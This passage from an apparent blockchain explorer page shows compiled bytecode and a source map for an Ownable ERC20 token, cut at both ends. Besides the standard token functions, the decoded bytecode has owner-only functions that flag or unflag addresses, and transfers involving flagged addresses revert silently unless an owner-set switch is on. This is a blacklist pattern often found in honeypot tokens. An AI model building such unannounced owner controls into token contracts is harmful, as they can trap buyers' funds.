806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561102a57808201518184015260208101905061100f565b83811115611039576000848401525b50505050565b6000601f19601f8301169050919050565b600061105b82610ff0565b6110658185610ffb565b935061107581856020860161100c565b61107e8161103f565b840191505092915050565b600060208201905081810360008301526110a38184611050565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006110e0826110b5565b9050919050565b6110f0816110d5565b81146110fb57600080fd5b50565b60008135905061110d816110e7565b92915050565b6000819050919050565b61112681611113565b811461113157600080fd5b50565b6000813590506111438161111d565b92915050565b600080604083850312156111605761115f6110ab565b5b600061116e858286016110fe565b925050602061117f85828601611134565b9150509250929050565b60008115159050919050565b61119e81611189565b82525050565b60006020820190506111b96000830184611195565b92915050565b6111c881611113565b82525050565b60006020820190506111e360008301846111bf565b92915050565b600080600060608486031215611202576112016110ab565b5b6000611210868287016110fe565b9350506020611221868287016110fe565b925050604061123286828701611134565b9150509250925092565b600060ff82169050919050565b6112528161123c565b82525050565b600060208201905061126d6000830184611249565b92915050565b600060208284031215611289576112886110ab565b5b6000611297848285016110fe565b91505092915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126112c5576112c46112a0565b5b8235905067ffffffffffffffff8111156112e2576112e16112a5565b5b6020830191508360208202830111156112fe576112fd6112aa565b5b9250929050565b6000806020838503121561131c5761131b6110ab565b5b600083013567ffffffffffffffff81111561133a576113396110b0565b5b611346858286016112af565b92509250509250929050565b61135b816110d5565b82525050565b60006020820190506113766000830184611352565b92915050565b60008060408385031215611393576113926110ab565b5b60006113a1858286016110fe565b92505060206113b2858286016110fe565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061140357607f821691505b60208210811415611417576114166113bc565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061145782611113565b915061146283611113565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156114975761149661141d565b5b828201905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061152d602583610ffb565b9150611538826114d1565b604082019050919050565b6000602082019050818103600083015261155c81611520565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006115bf602683610ffb565b91506115ca82611563565b604082019050919050565b600060208201905081810360008301526115ee816115b2565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611651602483610ffb565b915061165c826115f5565b604082019050919050565b6000602082019050818103600083015261168081611644565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006116e3602283610ffb565b91506116ee82611687565b604082019050919050565b60006020820190508181036000830152611712816116d6565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b600061174f601d83610ffb565b915061175a82611719565b602082019050919050565b6000602082019050818103600083015261177e81611742565b9050919050565b50565b6000611795600083610ffb565b91506117a082611785565b600082019050919050565b600060208201905081810360008301526117c481611788565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611827602583610ffb565b9150611832826117cb565b604082019050919050565b600060208201905081810360008301526118568161181a565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006118b9602383610ffb565b91506118c48261185d565b604082019050919050565b600060208201905081810360008301526118e8816118ac565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b600061194b602683610ffb565b9150611956826118ef565b604082019050919050565b6000602082019050818103600083015261197a8161193e565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006119b7602083610ffb565b91506119c282611981565b602082019050919050565b600060208201905081810360008301526119e6816119aa565b905091905056fea2646970667358221220ac4a9f8418782d7b9c5ebe333e1de5db723a0948a403ee37c371c36d6caf36af64736f6c634300080c0033

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061010b5760003560e01c8063715018a6116100a2578063a457c2d711610071578063a457c2d7146102bc578063a9059cbb146102ec578063dd62ed3e1461031c578063f2fde38b1461034c578063f3294c13146103685761010b565b8063715018a61461025a5780637a49cddb146102645780638da5cb5b1461028057806395d89b411461029e5761010b565b8063313ce567116100de578063313ce567146101ac57806332a0e002146101ca57806339509351146101fa57806370a082311461022a5761010b565b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015e57806323b872dd1461017c575b600080fd5b610118610384565b6040516101259190611089565b60405180910390f35b61014860048036038101906101439190611149565b610416565b60405161015591906111a4565b60405180910390f35b610166610439565b60405161017391906111ce565b60405180910390f35b610196600480360381019061019191906111e9565b610443565b6040516101a391906111a4565b60405180910390f35b6101b4610472565b6040516101c19190611258565b60405180910390f35b6101e460048036038101906101df9190611273565b61047b565b6040516101f191906111a4565b60405180910390f35b610214600480360381019061020f9190611149565b6104d1565b60405161022191906111a4565b60405180910390f35b610244600480360381019061023f9190611273565b610508565b60405161025191906111ce565b60405180910390f35b610262610551565b005b61027e60048036038101906102799190611305565b610565565b005b61028861060a565b6040516102959190611361565b60405180910390f35b6102a6610633565b6040516102b39190611089565b60405180910390f35b6102d660048036038101906102d19190611149565b6106c5565b6040516102e391906111a4565b60405180910390f35b61030660048036038101906103019190611149565b61073c565b60405161031391906111a4565b60405180910390f35b6103366004803603810190610331919061137c565b61075f565b60405161034391906111ce565b60405180910390f35b61036660048036038101906103619190611273565b6107e6565b005b610382600480360381019061037d9190611273565b61086a565b005b606060058054610393906113eb565b80601f01602080910402602001604051908101604052809291908181526020018280546103bf906113eb565b801561040c5780601f106103e15761010080835404028352916020019161040c565b820191906000526020600020905b8154815290600101906020018083116103ef57829003601f168201915b5050505050905090565b6000806104216108cd565b905061042e8185856108d5565b600191505092915050565b6000600454905090565b60008061044e6108cd565b905061045b858285610aa0565b610466858585610b2c565b60019150509392505050565b60006012905090565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000806104dc6108cd565b90506104fd8185856104ee858961075f565b6104f8919061144c565b6108d5565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610559610ea4565b6105636000610f22565b565b61056d610ea4565b60005b8282905081101561060557600160026000858585818110610594576105936114a2565b5b90506020020160208101906105a99190611273565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550806001019050610570565b505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060068054610642906113eb565b80601f016020809104026020016040519081016040528092919081815260200182805461066e906113eb565b80156106bb5780601f10610690576101008083540402835291602001916106bb565b820191906000526020600020905b81548152906001019060200180831161069e57829003601f168201915b5050505050905090565b6000806106d06108cd565b905060006106de828661075f565b905083811015610723576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161071a90611543565b60405180910390fd5b61073082868684036108d5565b60019250505092915050565b6000806107476108cd565b9050610754818585610b2c565b600191505092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6107ee610ea4565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16141561085e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610855906115d5565b60405180910390fd5b61086781610f22565b50565b610872610ea4565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610945576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161093c90611667565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156109b5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109ac906116f9565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610a9391906111ce565b60405180910390a3505050565b6000610aac848461075f565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610b265781811015610b18576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b0f90611765565b60405180910390fd5b610b2584848484036108d5565b5b50505050565b600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610bcd5750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15610c295760011515600760009054906101000a900460ff16151514610c28576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c1f906117ab565b60405180910390fd5b5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610c99576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c909061183d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610d09576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d00906118cf565b60405180910390fd5b610d14838383610fe6565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610d9b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d9290611961565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610e8b91906111ce565b60405180910390a3610e9e848484610feb565b50505050565b610eac6108cd565b73ffffffffffffffffffffffffffffffffffffffff16610eca61060a565b73ffffffffffffffffffffffffffffffffffffffff1614610f20576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f17906119cd565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561102a57808201518184015260208101905061100f565b83811115611039576000848401525b50505050565b6000601f19601f8301169050919050565b600061105b82610ff0565b6110658185610ffb565b935061107581856020860161100c565b61107e8161103f565b840191505092915050565b600060208201905081810360008301526110a38184611050565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006110e0826110b5565b9050919050565b6110f0816110d5565b81146110fb57600080fd5b50565b60008135905061110d816110e7565b92915050565b6000819050919050565b61112681611113565b811461113157600080fd5b50565b6000813590506111438161111d565b92915050565b600080604083850312156111605761115f6110ab565b5b600061116e858286016110fe565b925050602061117f85828601611134565b9150509250929050565b60008115159050919050565b61119e81611189565b82525050565b60006020820190506111b96000830184611195565b92915050565b6111c881611113565b82525050565b60006020820190506111e360008301846111bf565b92915050565b600080600060608486031215611202576112016110ab565b5b6000611210868287016110fe565b9350506020611221868287016110fe565b925050604061123286828701611134565b9150509250925092565b600060ff82169050919050565b6112528161123c565b82525050565b600060208201905061126d6000830184611249565b92915050565b600060208284031215611289576112886110ab565b5b6000611297848285016110fe565b91505092915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126112c5576112c46112a0565b5b8235905067ffffffffffffffff8111156112e2576112e16112a5565b5b6020830191508360208202830111156112fe576112fd6112aa565b5b9250929050565b6000806020838503121561131c5761131b6110ab565b5b600083013567ffffffffffffffff81111561133a576113396110b0565b5b611346858286016112af565b92509250509250929050565b61135b816110d5565b82525050565b60006020820190506113766000830184611352565b92915050565b60008060408385031215611393576113926110ab565b5b60006113a1858286016110fe565b92505060206113b2858286016110fe565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061140357607f821691505b60208210811415611417576114166113bc565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061145782611113565b915061146283611113565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156114975761149661141d565b5b828201905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061152d602583610ffb565b9150611538826114d1565b604082019050919050565b6000602082019050818103600083015261155c81611520565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006115bf602683610ffb565b91506115ca82611563565b604082019050919050565b600060208201905081810360008301526115ee816115b2565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611651602483610ffb565b915061165c826115f5565b604082019050919050565b6000602082019050818103600083015261168081611644565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006116e3602283610ffb565b91506116ee82611687565b604082019050919050565b60006020820190508181036000830152611712816116d6565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b600061174f601d83610ffb565b915061175a82611719565b602082019050919050565b6000602082019050818103600083015261177e81611742565b9050919050565b50565b6000611795600083610ffb565b91506117a082611785565b600082019050919050565b600060208201905081810360008301526117c481611788565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611827602583610ffb565b9150611832826117cb565b604082019050919050565b600060208201905081810360008301526118568161181a565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006118b9602383610ffb565b91506118c48261185d565b604082019050919050565b600060208201905081810360008301526118e8816118ac565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b600061194b602683610ffb565b9150611956826118ef565b604082019050919050565b6000602082019050818103600083015261197a8161193e565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006119b7602083610ffb565b91506119c282611981565b602082019050919050565b600060208201905081810360008301526119e6816119aa565b905091905056fea2646970667358221220ac4a9f8418782d7b9c5ebe333e1de5db723a0948a403ee37c371c36d6caf36af64736f6c634300080c0033

Deployed Bytecode Sourcemap

85:177:4:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2288:100:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5089:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3858:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5870:295;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3250:93;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3687:106;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6574:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4029:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2588:103:0;;;:::i;:::-;;3351:223:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;1947:87:0;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2507:104:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7315:436;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4362:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4618:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2846:201:0;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;3582:97:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2288:100;2342:13;2375:5;2368:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2288:100;:::o;5089:201::-;5172:4;5189:13;5205:12;:10;:12::i;:::-;5189:28;;5228:32;5237:5;5244:7;5253:6;5228:8;:32::i;:::-;5278:4;5271:11;;;5089:201;;;;:::o;3858:108::-;3919:7;3946:12;;3939:19;;3858:108;:::o;5870:295::-;6001:4;6018:15;6036:12;:10;:12::i;:::-;6018:30;;6059:38;6075:4;6081:7;6090:6;6059:15;:38::i;:::-;6108:27;6118:4;6124:2;6128:6;6108:9;:27::i;:::-;6153:4;6146:11;;;5870:295;;;;;:::o;3250:93::-;3308:5;3333:2;3326:9;;3250:93;:::o;3687:106::-;3744:4;3768:8;:17;3777:7;3768:17;;;;;;;;;;;;;;;;;;;;;;;;;3761:24;;3687:106;;;:::o;6574:238::-;6662:4;6679:13;6695:12;:10;:12::i;:::-;6679:28;;6718:64;6727:5;6734:7;6771:10;6743:25;6753:5;6760:7;6743:9;:25::i;:::-;:38;;;;:::i;:::-;6718:8;:64::i;:::-;6800:4;6793:11;;;6574:238;;;;:::o;4029:127::-;4103:7;4130:9;:18;4140:7;4130:18;;;;;;;;;;;;;;;;4123:25;;4029:127;;;:::o;2588:103:0:-;1833:13;:11;:13::i;:::-;2653:30:::1;2680:1;2653:18;:30::i;:::-;2588:103::o:0;3351:223:1:-;1833:13:0;:11;:13::i;:::-;3434:9:1::1;3429:128;3453:7;;:14;;3449:1;:18;3429:128;;;3509:4;3486:8;:20;3495:7;;3503:1;3495:10;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;3486:20;;;;;;;;;;;;;;;;:27;;;;;;;;;;;;;;;;;;3540:3;;;;;3429:128;;;;3351:223:::0;;:::o;1947:87:0:-;1993:7;2020:6;;;;;;;;;;;2013:13;;1947:87;:::o;2507:104:1:-;2563:13;2596:7;2589:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2507:104;:::o;7315:436::-;7408:4;7425:13;7441:12;:10;:12::i;:::-;7425:28;;7464:24;7491:25;7501:5;7508:7;7491:9;:25::i;:::-;7464:52;;7555:15;7535:16;:35;;7527:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;7648:60;7657:5;7664:7;7692:15;7673:16;:34;7648:8;:60::i;:::-;7739:4;7732:11;;;;7315:436;;;;:::o;4362:193::-;4441:4;4458:13;4474:12;:10;:12::i;:::-;4458:28;;4497;4507:5;4514:2;4518:6;4497:9;:28::i;:::-;4543:4;4536:11;;;4362:193;;;;:::o;4618:151::-;4707:7;4734:11;:18;4746:5;4734:18;;;;;;;;;;;;;;;:27;4753:7;4734:27;;;;;;;;;;;;;;;;4727:34;;4618:151;;;;:::o;2846:201:0:-;1833:13;:11;:13::i;:::-;2955:1:::1;2935:22;;:8;:22;;;;2927:73;;;;;;;;;;;;:::i;:::-;;;;;;;;;3011:28;3030:8;3011:18;:28::i;:::-;2846:201:::0;:::o;3582:97:1:-;1833:13:0;:11;:13::i;:::-;3666:5:1::1;3646:8;:17;3655:7;3646:17;;;;;;;;;;;;;;;;:25;;;;;;;;;;;;;;;;;;3582:97:::0;:::o;656:98:0:-;709:7;736:10;729:17;;656:98;:::o;11425:380:1:-;11578:1;11561:19;;:5;:19;;;;11553:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;11659:1;11640:21;;:7;:21;;;;11632:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;11743:6;11713:11;:18;11725:5;11713:18;;;;;;;;;;;;;;;:27;11732:7;11713:27;;;;;;;;;;;;;;;:36;;;;11781:7;11765:32;;11774:5;11765:32;;;11790:6;11765:32;;;;;;:::i;:::-;;;;;;;;11425:380;;;:::o;12096:453::-;12231:24;12258:25;12268:5;12275:7;12258:9;:25::i;:::-;12231:52;;12318:17;12298:16;:37;12294:248;;12380:6;12360:16;:26;;12352:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;12464:51;12473:5;12480:7;12508:6;12489:16;:25;12464:8;:51::i;:::-;12294:248;12220:329;12096:453;;;:::o;8221:923::-;8348:8;:12;8357:2;8348:12;;;;;;;;;;;;;;;;;;;;;;;;;:30;;;;8364:8;:14;8373:4;8364:14;;;;;;;;;;;;;;;;;;;;;;;;;8348:30;8344:72;;;8407:4;8388:23;;:15;;;;;;;;;;;:23;;;8380:36;;;;;;;;;;;;:::i;:::-;;;;;;;;;8344:72;8451:1;8435:18;;:4;:18;;;;8427:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;8528:1;8514:16;;:2;:16;;;;8506:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;8583:38;8604:4;8610:2;8614:6;8583:20;:38::i;:::-;8634:19;8656:9;:15;8666:4;8656:15;;;;;;;;;;;;;;;;8634:37;;8705:6;8690:11;:21;;8682:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;8822:6;8808:11;:20;8790:9;:15;8800:4;8790:15;;;;;;;;;;;;;;;:38;;;;9025:6;9008:9;:13;9018:2;9008:13;;;;;;;;;;;;;;;;:23;;;;;;;;;;;9075:2;9060:26;;9069:4;9060:26;;;9079:6;9060:26;;;;;;:::i;:::-;;;;;;;;9099:37;9119:4;9125:2;9129:6;9099:19;:37::i;:::-;8333:811;8221:923;;;:::o;2112:132:0:-;2187:12;:10;:12::i;:::-;2176:23;;:7;:5;:7::i;:::-;:23;;;2168:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;2112:132::o;3207:191::-;3281:16;3300:6;;;;;;;;;;;3281:25;;3326:8;3317:6;;:17;;;;;;;;;;;;;;;;;;3381:8;3350:40;;3371:8;3350:40;;;;;;;;;;;;3270:128;3207:191;:::o;13149:125:1:-;;;;:::o;13878:124::-;;;;:::o;7:99:5:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:307::-;355:1;365:113;379:6;376:1;373:13;365:113;;;464:1;459:3;455:11;449:18;445:1;440:3;436:11;429:39;401:2;398:1;394:10;389:15;;365:113;;;496:6;493:1;490:13;487:101;;;576:1;567:6;562:3;558:16;551:27;487:101;336:258;287:307;;;:::o;600:102::-;641:6;692:2;688:7;683:2;676:5;672:14;668:28;658:38;;600:102;;;:::o;708:364::-;796:3;824:39;857:5;824:39;:::i;:::-;879:71;943:6;938:3;879:71;:::i;:::-;872:78;;959:52;1004:6;999:3;992:4;985:5;981:16;959:52;:::i;:::-;1036:29;1058:6;1036:29;:::i;:::-;1031:3;1027:39;1020:46;;800:272;708:364;;;;:::o;1078:313::-;1191:4;1229:2;1218:9;1214:18;1206:26;;1278:9;1272:4;1268:20;1264:1;1253:9;1249:17;1242:47;1306:78;1379:4;1370:6;1306:78;:::i;:::-;1298:86;;1078:313;;;;:::o;1478:117::-;1587:1;1584;1577:12;1601:117;1710:1;1707;1700:12;1724:126;1761:7;1801:42;1794:5;1790:54;1779:65;;1724:126;;;:::o;1856:96::-;1893:7;1922:24;1940:5;1922:24;:::i;:::-;1911:35;;1856:96;;;:::o;1958:122::-;2031:24;2049:5;2031:24;:::i;:::-;2024:5;2021:35;2011:63;;2070:1;2067;2060:12;2011:63;1958:122;:::o;2086:139::-;2132:5;2170:6;2157:20;2148:29;;2186:33;2213:5;2186:33;:::i;:::-;2086:139;;;;:::o;2231:77::-;2268:7;2297:5;2286:16;;2231:77;;;:::o;2314:122::-;2387:24;2405:5;2387:24;:::i;:::-;2380:5;2377:35;2367:63;;2426:1;2423;2416:12;2367:63;2314:122;:::o;2442:139::-;2488:5;2526:6;2513:20;2504:29;;2542:33;2569:5;2542:33;:::i;:::-;2442:139;;;;:::o;2587:474::-;2655:6;2663;2712:2;2700:9;2691:7;2687:23;2683:32;2680:119;;;2718:79;;:::i;:::-;2680:119;2838:1;2863:53;2908:7;2899:6;2888:9;2884:22;2863:53;:::i;:::-;2853:63;;2809:117;2965:2;2991:53;3036:7;3027:6;3016:9;3012:22;2991:53;:::i;:::-;2981:63;;2936:118;2587:474;;;;;:::o;3067:90::-;3101:7;3144:5;3137:13;3130:21;3119:32;;3067:90;;;:::o;3163:109::-;3244:21;3259:5;3244:21;:::i;:::-;3239:3;3232:34;3163:109;;:::o;3278:210::-;3365:4;3403:2;3392:9;3388:18;3380:26;;3416:65;3478:1;3467:9;3463:17;3454:6;3416:65;:::i;:::-;3278:210;;;;:::o;3494:118::-;3581:24;3599:5;3581:24;:::i;:::-;3576:3;3569:37;3494:118;;:::o;3618:222::-;3711:4;3749:2;3738:9;3734:18;3726:26;;3762:71;3830:1;3819:9;3815:17;3806:6;3762:71;:::i;:::-;3618:222;;;;:::o;3846:619::-;3923:6;3931;3939;3988:2;3976:9;3967:7;3963:23;3959:32;3956:119;;;3994:79;;:::i;:::-;3956:119;4114:1;4139:53;4184:7;4175:6;4164:9;4160:22;4139:53;:::i;:::-;4129:63;;4085:117;4241:2;4267:53;4312:7;4303:6;4292:9;4288:22;4267:53;:::i;:::-;4257:63;;4212:118;4369:2;4395:53;4440:7;4431:6;4420:9;4416:22;4395:53;:::i;:::-;4385:63;;4340:118;3846:619;;;;;:::o;4471:86::-;4506:7;4546:4;4539:5;4535:16;4524:27;;4471:86;;;:::o;4563:112::-;4646:22;4662:5;4646:22;:::i;:::-;4641:3;4634:35;4563:112;;:::o;4681:214::-;4770:4;4808:2;4797:9;4793:18;4785:26;;4821:67;4885:1;4874:9;4870:17;4861:6;4821:67;:::i;:::-;4681:214;;;;:::o;4901:329::-;4960:6;5009:2;4997:9;4988:7;4984:23;4980:32;4977:119;;;5015:79;;:::i;:::-;4977:119;5135:1;5160:53;5205:7;5196:6;5185:9;5181:22;5160:53;:::i;:::-;5150:63;;5106:117;4901:329;;;;:::o;5236:117::-;5345:1;5342;5335:12;5359:117;5468:1;5465;5458:12;5482:117;5591:1;5588;5581:12;5622:568;5695:8;5705:6;5755:3;5748:4;5740:6;5736:17;5732:27;5722:122;;5763:79;;:::i;:::-;5722:122;5876:6;5863:20;5853:30;;5906:18;5898:6;5895:30;5892:117;;;5928:79;;:::i;:::-;5892:117;6042:4;6034:6;6030:17;6018:29;;6096:3;6088:4;6080:6;6076:17;6066:8;6062:32;6059:41;6056:128;;;6103:79;;:::i;:::-;6056:128;5622:568;;;;;:::o;6196:559::-;6282:6;6290;6339:2;6327:9;6318:7;6314:23;6310:32;6307:119;;;6345:79;;:::i;:::-;6307:119;6493:1;6482:9;6478:17;6465:31;6523:18;6515:6;6512:30;6509:117;;;6545:79;;:::i;:::-;6509:117;6658:80;6730:7;6721:6;6710:9;6706:22;6658:80;:::i;:::-;6640:98;;;;6436:312;6196:559;;;;;:::o;6761:118::-;6848:24;6866:5;6848:24;:::i;:::-;6843:3;6836:37;6761:118;;:::o;6885:222::-;6978:4;7016:2;7005:9;7001:18;6993:26;;7029:71;7097:1;7086:9;7082:17;7073:6;7029:71;:::i;:::-;6885:222;;;;:::o;7113:474::-;7181:6;7189;7238:2;7226:9;7217:7;7213:23;7209:32;7206:119;;;7244:79;;:::i;:::-;7206:119;7364:1;7389:53;7434:7;7425:6;7414:9;7410:22;7389:53;:::i;:::-;7379:63;;7335:117;7491:2;7517:53;7562:7;7553:6;7542:9;7538:22;7517:53;:::i;:::-;7507:63;;7462:118;7113